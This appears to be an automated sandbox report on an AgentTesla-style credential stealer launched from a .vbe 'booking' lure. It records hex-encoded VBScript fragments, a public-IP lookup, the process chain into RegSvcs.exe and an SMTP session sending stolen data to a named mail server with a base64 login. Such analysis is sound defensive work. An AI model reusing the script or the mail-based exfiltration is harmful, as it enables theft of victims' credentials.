                                                    2024-11-12 12:40:06 UTC1369INData Raw: 36 33 36 31 37 32 32 30 37 33 36 39 32 30 37 35 36 45 32 30 37 30 37 32 36 46 36 33 36 35 37 33 36 46 32 30 36 35 37 33 37 30 36 35 36 33 45 44 36 36 36 39 36 33 36 46 32 30 36 35 37 33 37 34 45 31 32 30 36 35 36 45 32 30 36 35 36 41 36 35 36 33 37 35 36 33 36 39 46 33 36 45 30 41 34 36 37 35 36 45 36 33 37 34 36 39 36 46 36 45 32 30 35 30 34 35 35 31 32 38 34 45 35 30 35 32 32 39 30 41 32 30 32 30 32 30 32 30 34 34 36 39 36 44 32 30 35 33 35 37 34 39 32 43 32 30 34 43 35 30 34 31 30 41 32 30 32 30 32 30 32 30 35 33 36 35 37 34 32 30 35 33 35 37 34 39 32 30 33 44 32 30 34 37 36 35 37 34 34 46 36 32 36 41 36 35 36 33 37 34 32 38 32 32 37 37 36 39 36 45 36 44 36 37 36 44 37 34 37 33 33 41 35 43 35 43 32 45 35 43 37 32 36 46 36 46 37 34 35 43 36 33 36 39 36
                                                    Data Ascii: 63617220736920756E2070726F6365736F206573706563ED6669636F20657374E120656E20656A6563756369F36E0A46756E6374696F6E20504551284E5052290A2020202044696D205357492C204C50410A2020202053657420535749203D204765744F626A656374282277696E6D676D74733A5C5C2E5C726F6F745C63696
                                                    2024-11-12 12:40:06 UTC1369INData Raw: 30 34 35 37 38 36 39 37 34 32 30 34 36 37 35 36 45 36 33 37 34 36 39 36 46 36 45 30 41 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 34 35 36 45 36 34 32 30 34 39 36 36 30 41 32 30 32 30 32 30 32 30 34 45 36 35 37 38 37 34 30 41 32 30 32 30 32 30 32 30 30 41 32 30 32 30 32 30 32 30 35 33 36 35 37 34 32 30 34 32 35 30 35 33 32 30 33 44 32 30 34 45 36 46 37 34 36 38 36 39 36 45 36 37 30 41 34 35 36 45 36 34 32 30 34 36 37 35 36 45 36 33 37 34 36 39 36 46 36 45 30 41 30 41 32 37 32 30 35 30 37 32 36 46 36 33 36 35 36 34 36 39 36 44 36 39 36 35 36 45 37 34 36 46 32 30 37 30 36 31 37 32 36 31 32 30 36 35 36 41 36 35 36 33 37 35 37 34 36 31 37 32 32 30 36 33 36 46 36 44 36 31 36 45 36 34 36 46 37 33 32 30 36 35 37 33 37 30 36 35 36 33 45 44 36 36 36 39 36 33
                                                    Data Ascii: 0457869742046756E6374696F6E0A2020202020202020456E642049660A202020204E6578740A202020200A2020202053657420425053203D204E6F7468696E670A456E642046756E6374696F6E0A0A272050726F636564696D69656E746F207061726120656A65637574617220636F6D616E646F73206573706563ED666963
                                                    2024-11-12 12:40:06 UTC666INData Raw: 34 39 37 33 32 30 34 45 36 46 37 34 36 38 36 39 36 45 36 37 32 30 35 34 36 38 36 35 36 45 30 41 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 34 35 34 33 35 30 32 38 35 30 35 30 34 36 32 39 30 41 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 34 35 36 45 36 34 32 30 34 39 36 36 30 41 32 30 32 30 32 30 32 30 34 35 36 45 36 34 32 30 34 39 36 36 30 41 34 35 36 45 36 34 32 30 35 33 37 35 36 32 30 41 30 41 32 37 32 30 35 32 37 35 37 34 36 39 36 45 36 31 32 30 37 30 37 32 36 39 36 45 36 33 36 39 37 30 36 31 36 43 32 30 37 30 36 31 37 32 36 31 32 30 36 37 36 35 37 33 37 34 36 39 36 46 36 45 36 31 37 32 32 30 36 43 36 31 32 30 36 35 36 41 36 35 36 33 37 35 36 33 36 39 46 33 36 45 32 30 36 34 36 35 36 43 32 30 37 30 37 32 36 46 36 37 37
                                                    Data Ascii: 4973204E6F7468696E67205468656E0A20202020202020202020202045435028505046290A2020202020202020456E642049660A20202020456E642049660A456E64205375620A0A2720527574696E61207072696E636970616C20706172612067657374696F6E6172206C6120656A6563756369F36E2064656C2070726F677


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.549981104.26.12.2054433276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-12 12:41:10 UTC155OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                    Host: api.ipify.org
                                                    Connection: Keep-Alive
                                                    2024-11-12 12:41:10 UTC398INHTTP/1.1 200 OK
                                                    Date: Tue, 12 Nov 2024 12:41:10 GMT
                                                    Content-Type: text/plain
                                                    Content-Length: 14
                                                    Connection: close
                                                    Vary: Origin
                                                    cf-cache-status: DYNAMIC
                                                    Server: cloudflare
                                                    CF-RAY: 8e16983f7aad47ac-DFW
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=973&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=2967213&cwnd=251&unsent_bytes=0&cid=1378cbdc19b839c0&ts=267&x=0"
                                                    2024-11-12 12:41:10 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38
                                                    Data Ascii: 173.254.250.68


                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                    Nov 12, 2024 13:41:12.449523926 CET58749983162.254.34.31192.168.2.5220 server1.educt.shop127.0.0.1 ESMTP Postfix
                                                    Nov 12, 2024 13:41:12.449799061 CET49983587192.168.2.5162.254.34.31EHLO 302494
                                                    Nov 12, 2024 13:41:12.609038115 CET58749983162.254.34.31192.168.2.5250-server1.educt.shop127.0.0.1
                                                    250-PIPELINING
                                                    250-SIZE 204800000
                                                    250-ETRN
                                                    250-STARTTLS
                                                    250-AUTH PLAIN LOGIN
                                                    250-AUTH=PLAIN LOGIN
                                                    250-ENHANCEDSTATUSCODES
                                                    250-8BITMIME
                                                    250-DSN
                                                    250 CHUNKING
                                                    Nov 12, 2024 13:41:12.609981060 CET49983587192.168.2.5162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                    Nov 12, 2024 13:41:12.769959927 CET58749983162.254.34.31192.168.2.5334 UGFzc3dvcmQ6
                                                    Nov 12, 2024 13:41:12.947962046 CET58749983162.254.34.31192.168.2.5235 2.7.0 Authentication successful
                                                    Nov 12, 2024 13:41:12.948215961 CET49983587192.168.2.5162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                    Nov 12, 2024 13:41:13.107741117 CET58749983162.254.34.31192.168.2.5250 2.1.0 Ok
                                                    Nov 12, 2024 13:41:13.110208035 CET49983587192.168.2.5162.254.34.31RCPT TO:<ambro@educt.shop>
                                                    Nov 12, 2024 13:41:13.271050930 CET58749983162.254.34.31192.168.2.5250 2.1.5 Ok
                                                    Nov 12, 2024 13:41:13.274245024 CET49983587192.168.2.5162.254.34.31DATA
                                                    Nov 12, 2024 13:41:13.433584929 CET58749983162.254.34.31192.168.2.5354 End data with <CR><LF>.<CR><LF>
                                                    Nov 12, 2024 13:41:13.436924934 CET49983587192.168.2.5162.254.34.31.
                                                    Nov 12, 2024 13:41:13.600332022 CET58749983162.254.34.31192.168.2.5250 2.0.0 Ok: queued as 2F34860AFA

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:07:39:45
                                                    Start date:12/11/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe"
                                                    Imagebase:0x7ff768740000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:07:40:04
                                                    Start date:12/11/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs"
                                                    Imagebase:0x7ff768740000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:07:41:02
                                                    Start date:12/11/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs"
                                                    Imagebase:0x7ff768740000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:6
                                                    Start time:07:41:02
                                                    Start date:12/11/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:07:41:02
                                                    Start date:12/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:07:41:07
                                                    Start date:12/11/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                    Imagebase:0xd80000
                                                    File size:45'984 bytes
                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3296808679.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3296808679.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:07:41:08
                                                    Start date:12/11/2024
                                                    Path:C:\Windows\System32\wermgr.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "8092" "2736" "2688" "2740" "0" "0" "2744" "0" "0" "0" "0" "0"
                                                    Imagebase:0x7ff6070d0000
                                                    File size:229'728 bytes
                                                    MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:10.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:186
                                                      Total number of Limit Nodes:12
                                                      execution_graph 39937 2ea0848 39939 2ea084e 39937->39939 39938 2ea091b 39939->39938 39943 6b21cf0 39939->39943 39947 6b21d00 39939->39947 39951 2ea1380 39939->39951 39944 6b21d0f 39943->39944 39955 6b21494 39944->39955 39948 6b21d0f 39947->39948 39949 6b21494 2 API calls 39948->39949 39950 6b21d30 39949->39950 39950->39939 39952 2ea138b 39951->39952 39953 2ea1480 39952->39953 40078 2ea7ea8 39952->40078 39953->39939 39956 6b2149f 39955->39956 39959 6b22bf4 39956->39959 39958 6b236b6 39958->39958 39960 6b22bff 39959->39960 39961 6b23ddc 39960->39961 39964 6b25a63 39960->39964 39968 6b25a68 39960->39968 39961->39958 39966 6b25a68 39964->39966 39965 6b25aad 39965->39961 39966->39965 39972 6b25c18 39966->39972 39969 6b25a89 39968->39969 39970 6b25aad 39969->39970 39971 6b25c18 2 API calls 39969->39971 39970->39961 39971->39970 39973 6b25c25 39972->39973 39974 6b25c5e 39973->39974 39976 6b24dc8 39973->39976 39974->39965 39977 6b24dd3 39976->39977 39979 6b25cd0 39977->39979 39980 6b24dfc 39977->39980 39979->39979 39981 6b24e07 39980->39981 39987 6b24e0c 39981->39987 39983 6b25d3f 39991 6b2b060 39983->39991 40000 6b2b048 39983->40000 39984 6b25d79 39984->39979 39990 6b24e17 39987->39990 39988 6b26ee0 39988->39983 39989 6b25a68 2 API calls 39989->39988 39990->39988 39990->39989 39993 6b2b191 39991->39993 39994 6b2b091 39991->39994 39992 6b2b09d 39992->39984 39993->39984 39994->39992 40009 6b2b2d8 39994->40009 40013 6b2b2c8 39994->40013 39995 6b2b0dd 40018 6b2c5d8 39995->40018 40030 6b2c5c9 39995->40030 40002 6b2b091 40000->40002 40003 6b2b191 40000->40003 40001 6b2b09d 40001->39984 40002->40001 40005 6b2b2d8 GetModuleHandleW 40002->40005 40006 6b2b2c8 GetModuleHandleW 40002->40006 40003->39984 40004 6b2b0dd 40007 6b2c5d8 2 API calls 40004->40007 40008 6b2c5c9 2 API calls 40004->40008 40005->40004 40006->40004 40007->40003 40008->40003 40042 6b2b328 40009->40042 40049 6b2b318 40009->40049 40010 6b2b2e2 40010->39995 40014 6b2b2d8 40013->40014 40016 6b2b328 GetModuleHandleW 40014->40016 40017 6b2b318 GetModuleHandleW 40014->40017 40015 6b2b2e2 40015->39995 40016->40015 40017->40015 40019 6b2c603 40018->40019 40056 6b2a35c 40019->40056 40022 6b2c686 40025 6b2c6b2 40022->40025 40071 6b2a28c 40022->40071 40028 6b2a35c GetModuleHandleW 40028->40022 40031 6b2c603 40030->40031 40032 6b2a35c GetModuleHandleW 40031->40032 40033 6b2c66a 40032->40033 40039 6b2cb40 GetModuleHandleW 40033->40039 40040 6b2ca91 GetModuleHandleW 40033->40040 40041 6b2a35c GetModuleHandleW 40033->40041 40034 6b2c686 40035 6b2a28c GetModuleHandleW 40034->40035 40037 6b2c6b2 40034->40037 40036 6b2c6f6 40035->40036 40038 6b2d4c0 CreateWindowExW 40036->40038 40038->40037 40039->40034 40040->40034 40041->40034 40043 6b2b339 40042->40043 40046 6b2b354 40042->40046 40044 6b2a28c GetModuleHandleW 40043->40044 40045 6b2b344 40044->40045 40045->40046 40047 6b2b5c0 GetModuleHandleW 40045->40047 40048 6b2b5b1 GetModuleHandleW 40045->40048 40046->40010 40047->40046 40048->40046 40050 6b2b31d 40049->40050 40051 6b2a28c GetModuleHandleW 40050->40051 40053 6b2b354 40050->40053 40052 6b2b344 40051->40052 40052->40053 40054 6b2b5c0 GetModuleHandleW 40052->40054 40055 6b2b5b1 GetModuleHandleW 40052->40055 40053->40010 40054->40053 40055->40053 40057 6b2a367 40056->40057 40058 6b2c66a 40057->40058 40059 6b2ccb0 GetModuleHandleW 40057->40059 40060 6b2cca0 GetModuleHandleW 40057->40060 40058->40028 40061 6b2ca91 40058->40061 40066 6b2cb40 40058->40066 40059->40058 40060->40058 40062 6b2ca9d 40061->40062 40063 6b2caab 40062->40063 40064 6b2ccb0 GetModuleHandleW 40062->40064 40065 6b2cca0 GetModuleHandleW 40062->40065 40063->40022 40064->40063 40065->40063 40067 6b2cb6d 40066->40067 40068 6b2cbee 40067->40068 40069 6b2ccb0 GetModuleHandleW 40067->40069 40070 6b2cca0 GetModuleHandleW 40067->40070 40069->40068 40070->40068 40073 6b2b518 GetModuleHandleW 40071->40073 40074 6b2b58d 40073->40074 40075 6b2d4c0 40074->40075 40076 6b2a444 CreateWindowExW 40075->40076 40077 6b2d4f5 40076->40077 40077->40025 40079 2ea7eb2 40078->40079 40080 2ea7ecc 40079->40080 40083 6b3faa9 40079->40083 40087 6b3fab8 40079->40087 40080->39952 40085 6b3facd 40083->40085 40084 6b3fce2 40084->40080 40085->40084 40086 6b3fcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx 40085->40086 40086->40085 40089 6b3facd 40087->40089 40088 6b3fce2 40088->40080 40089->40088 40090 6b3fcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx 40089->40090 40090->40089 40091 183d030 40092 183d048 40091->40092 40093 183d0a2 40092->40093 40098 6b2d6c8 40092->40098 40102 6b2e818 40092->40102 40111 6b2d6c7 40092->40111 40115 6b2a46c 40092->40115 40099 6b2d6ee 40098->40099 40100 6b2a46c CallWindowProcW 40099->40100 40101 6b2d70f 40100->40101 40101->40093 40105 6b2e855 40102->40105 40103 6b2e889 40140 6b2e49c 40103->40140 40105->40103 40106 6b2e879 40105->40106 40124 6b2e9b0 40106->40124 40129 6b2ea7c 40106->40129 40135 6b2e9a0 40106->40135 40107 6b2e887 40112 6b2d6c8 40111->40112 40113 6b2a46c CallWindowProcW 40112->40113 40114 6b2d70f 40113->40114 40114->40093 40116 6b2a477 40115->40116 40117 6b2e889 40116->40117 40119 6b2e879 40116->40119 40118 6b2e49c CallWindowProcW 40117->40118 40120 6b2e887 40118->40120 40121 6b2e9b0 CallWindowProcW 40119->40121 40122 6b2e9a0 CallWindowProcW 40119->40122 40123 6b2ea7c CallWindowProcW 40119->40123 40121->40120 40122->40120 40123->40120 40125 6b2e9c4 40124->40125 40144 6b2ea58 40125->40144 40148 6b2ea68 40125->40148 40126 6b2ea50 40126->40107 40130 6b2ea3a 40129->40130 40131 6b2ea8a 40129->40131 40133 6b2ea68 CallWindowProcW 40130->40133 40134 6b2ea58 CallWindowProcW 40130->40134 40132 6b2ea50 40132->40107 40133->40132 40134->40132 40137 6b2e9b1 40135->40137 40136 6b2ea50 40136->40107 40138 6b2ea68 CallWindowProcW 40137->40138 40139 6b2ea58 CallWindowProcW 40137->40139 40138->40136 40139->40136 40141 6b2e4a7 40140->40141 40142 6b2fcea CallWindowProcW 40141->40142 40143 6b2fc99 40141->40143 40142->40143 40143->40107 40145 6b2ea68 40144->40145 40146 6b2ea79 40145->40146 40151 6b2fc20 40145->40151 40146->40126 40149 6b2ea79 40148->40149 40150 6b2fc20 CallWindowProcW 40148->40150 40149->40126 40150->40149 40152 6b2e49c CallWindowProcW 40151->40152 40153 6b2fc3a 40152->40153 40153->40146 40154 6b22e08 40155 6b22e4e 40154->40155 40159 6b22fe8 40155->40159 40162 6b22fd8 40155->40162 40156 6b22f3b 40166 6b22b20 40159->40166 40163 6b22fe8 40162->40163 40164 6b22b20 DuplicateHandle 40163->40164 40165 6b23016 40164->40165 40165->40156 40167 6b23050 DuplicateHandle 40166->40167 40168 6b23016 40167->40168 40168->40156

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 659 6b33100-6b33121 660 6b33123-6b33126 659->660 661 6b33128-6b33147 660->661 662 6b3314c-6b3314f 660->662 661->662 663 6b338f0-6b338f2 662->663 664 6b33155-6b33174 662->664 665 6b338f4 663->665 666 6b338f9-6b338fc 663->666 672 6b33176-6b33179 664->672 673 6b3318d-6b33197 664->673 665->666 666->660 669 6b33902-6b3390b 666->669 672->673 674 6b3317b-6b3318b 672->674 677 6b3319d-6b331ac 673->677 674->677 785 6b331ae call 6b33920 677->785 786 6b331ae call 6b33918 677->786 678 6b331b3-6b331b8 679 6b331c5-6b334a2 678->679 680 6b331ba-6b331c0 678->680 701 6b338e2-6b338ef 679->701 702 6b334a8-6b33557 679->702 680->669 711 6b33580 702->711 712 6b33559-6b3357e 702->712 713 6b33589-6b3359c 711->713 712->713 716 6b335a2-6b335c4 713->716 717 6b338c9-6b338d5 713->717 716->717 720 6b335ca-6b335d4 716->720 717->702 718 6b338db 717->718 718->701 720->717 721 6b335da-6b335e5 720->721 721->717 722 6b335eb-6b336c1 721->722 734 6b336c3-6b336c5 722->734 735 6b336cf-6b336ff 722->735 734->735 739 6b33701-6b33703 735->739 740 6b3370d-6b33719 735->740 739->740 741 6b3371b-6b3371f 740->741 742 6b33779-6b3377d 740->742 741->742 745 6b33721-6b3374b 741->745 743 6b33783-6b337bf 742->743 744 6b338ba-6b338c3 742->744 755 6b337c1-6b337c3 743->755 756 6b337cd-6b337db 743->756 744->717 744->722 752 6b33759-6b33776 745->752 753 6b3374d-6b3374f 745->753 752->742 753->752 755->756 759 6b337f2-6b337fd 756->759 760 6b337dd-6b337e8 756->760 764 6b33815-6b33826 759->764 765 6b337ff-6b33805 759->765 760->759 763 6b337ea 760->763 763->759 769 6b33828-6b3382e 764->769 770 6b3383e-6b3384a 764->770 766 6b33807 765->766 767 6b33809-6b3380b 765->767 766->764 767->764 771 6b33832-6b33834 769->771 772 6b33830 769->772 774 6b33862-6b338b3 770->774 775 6b3384c-6b33852 770->775 771->770 772->770 774->744 776 6b33856-6b33858 775->776 777 6b33854 775->777 776->774 777->774 785->678 786->678
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-3723351465
                                                      • Opcode ID: deb8f2381e4bf810d571b75daf30bfd10139c31dc573b17391f17663273f6465
                                                      • Instruction ID: 17c21dc5e1cbb202086aeac62d753a7d83d22c79e4a9f440140e0b65847a04ff
                                                      • Opcode Fuzzy Hash: deb8f2381e4bf810d571b75daf30bfd10139c31dc573b17391f17663273f6465
                                                      • Instruction Fuzzy Hash: 15323E31E10659CFCB14DF79D89459DB7B2FFC9300F10D6AAD409AB224EB34A985CB91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1329 6b37df0-6b37e0e 1330 6b37e10-6b37e13 1329->1330 1331 6b37e15-6b37e2f 1330->1331 1332 6b37e34-6b37e37 1330->1332 1331->1332 1333 6b37e44-6b37e47 1332->1333 1334 6b37e39-6b37e42 1332->1334 1336 6b37e49-6b37e57 1333->1336 1337 6b37e5e-6b37e61 1333->1337 1334->1333 1344 6b37e96-6b37eac 1336->1344 1345 6b37e59 1336->1345 1338 6b37e63-6b37e7f 1337->1338 1339 6b37e84-6b37e86 1337->1339 1338->1339 1340 6b37e88 1339->1340 1341 6b37e8d-6b37e90 1339->1341 1340->1341 1341->1330 1341->1344 1349 6b37eb2-6b37ebb 1344->1349 1350 6b380c7-6b380d1 1344->1350 1345->1337 1351 6b380d2-6b380dc 1349->1351 1352 6b37ec1-6b37ede 1349->1352 1355 6b380de-6b38107 1351->1355 1356 6b3812d-6b3813e 1351->1356 1362 6b380b4-6b380c1 1352->1362 1363 6b37ee4-6b37f0c 1352->1363 1357 6b38109-6b3810c 1355->1357 1366 6b38123-6b38127 1356->1366 1367 6b38140-6b38184 1356->1367 1359 6b38112-6b38121 1357->1359 1360 6b38341-6b38344 1357->1360 1359->1366 1359->1367 1364 6b38367-6b3836a 1360->1364 1365 6b38346-6b38362 1360->1365 1362->1349 1362->1350 1363->1362 1381 6b37f12-6b37f1b 1363->1381 1369 6b38370-6b3837c 1364->1369 1370 6b38415-6b38417 1364->1370 1365->1364 1366->1356 1379 6b38315-6b3832b 1367->1379 1380 6b3818a-6b3819b 1367->1380 1378 6b38387-6b38389 1369->1378 1374 6b38419 1370->1374 1375 6b3841e-6b38421 1370->1375 1374->1375 1375->1357 1376 6b38427-6b38430 1375->1376 1384 6b383a1-6b383a5 1378->1384 1385 6b3838b-6b38391 1378->1385 1379->1360 1394 6b381a1-6b381be 1380->1394 1395 6b38300-6b3830f 1380->1395 1381->1351 1388 6b37f21-6b37f3d 1381->1388 1386 6b383b3 1384->1386 1387 6b383a7-6b383b1 1384->1387 1389 6b38393 1385->1389 1390 6b38395-6b38397 1385->1390 1392 6b383b8-6b383ba 1386->1392 1387->1392 1401 6b37f43-6b37f6d 1388->1401 1402 6b380a2-6b380ae 1388->1402 1389->1384 1390->1384 1396 6b383cb-6b38404 1392->1396 1397 6b383bc-6b383bf 1392->1397 1394->1395 1406 6b381c4-6b382ba call 6b36618 1394->1406 1395->1379 1395->1380 1396->1359 1416 6b3840a-6b38414 1396->1416 1397->1376 1414 6b37f73-6b37f9b 1401->1414 1415 6b38098-6b3809d 1401->1415 1402->1362 1402->1381 1463 6b382c8 1406->1463 1464 6b382bc-6b382c6 1406->1464 1414->1415 1422 6b37fa1-6b37fcf 1414->1422 1415->1402 1422->1415 1428 6b37fd5-6b37fde 1422->1428 1428->1415 1429 6b37fe4-6b38016 1428->1429 1437 6b38021-6b3803d 1429->1437 1438 6b38018-6b3801c 1429->1438 1437->1402 1440 6b3803f-6b38096 call 6b36618 1437->1440 1438->1415 1439 6b3801e 1438->1439 1439->1437 1440->1402 1465 6b382cd-6b382cf 1463->1465 1464->1465 1465->1395 1466 6b382d1-6b382d6 1465->1466 1467 6b382e4 1466->1467 1468 6b382d8-6b382e2 1466->1468 1469 6b382e9-6b382eb 1467->1469 1468->1469 1469->1395 1470 6b382ed-6b382f9 1469->1470 1470->1395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q
                                                      • API String ID: 0-127220927
                                                      • Opcode ID: 683b22335e051a5a93c538d5e71a353052b66f3f09c1f6012cc311b3124bb8c8
                                                      • Instruction ID: e05e8981b8661a7302c5a3fd38191c8109e435d727027321b71abb9f6a01f085
                                                      • Opcode Fuzzy Hash: 683b22335e051a5a93c538d5e71a353052b66f3f09c1f6012cc311b3124bb8c8
                                                      • Instruction Fuzzy Hash: AA02AF70B006259FDB54DF68D590A9EB7E6FF84304F148568E806EB390DB79EC46CB82

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1604 2eae270-2eae292 1605 2eae2f6-2eae2fd 1604->1605 1606 2eae294-2eae2bf 1604->1606 1611 2eae2c6-2eae2d3 1606->1611 1613 2eae2fe-2eae365 1611->1613 1614 2eae2d5-2eae2ee 1611->1614 1624 2eae36e-2eae37e 1613->1624 1625 2eae367-2eae369 1613->1625 1614->1605 1627 2eae380 1624->1627 1628 2eae385-2eae395 1624->1628 1626 2eae60d-2eae614 1625->1626 1627->1626 1630 2eae39b-2eae3a9 1628->1630 1631 2eae5f4-2eae602 1628->1631 1634 2eae3af 1630->1634 1635 2eae615-2eae68e 1630->1635 1631->1635 1636 2eae604-2eae608 call 2ea7b10 1631->1636 1634->1635 1638 2eae5e8-2eae5f2 1634->1638 1639 2eae54e-2eae574 1634->1639 1640 2eae48c-2eae4ad 1634->1640 1641 2eae50c-2eae549 1634->1641 1642 2eae3cd-2eae3ee 1634->1642 1643 2eae440-2eae461 1634->1643 1644 2eae466-2eae487 1634->1644 1645 2eae5a7-2eae5c2 call 2ea0350 1634->1645 1646 2eae5c4-2eae5e6 1634->1646 1647 2eae41a-2eae43b 1634->1647 1648 2eae579-2eae5a5 1634->1648 1649 2eae4df-2eae507 1634->1649 1650 2eae4b2-2eae4da 1634->1650 1651 2eae3f3-2eae415 1634->1651 1652 2eae3b6-2eae3c8 1634->1652 1636->1626 1638->1626 1639->1626 1640->1626 1641->1626 1642->1626 1643->1626 1644->1626 1645->1626 1646->1626 1647->1626 1648->1626 1649->1626 1650->1626 1651->1626 1652->1626
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xaq$$]q
                                                      • API String ID: 0-1280934391
                                                      • Opcode ID: cf2e0f1a1c160e4c8172b3ad83fa75281d715a675f68a2208c34247da747d494
                                                      • Instruction ID: 70bd27f97c8a9a92b97f12e8c313e31cd806e9794b43357f7d38e8f2b5cfb810
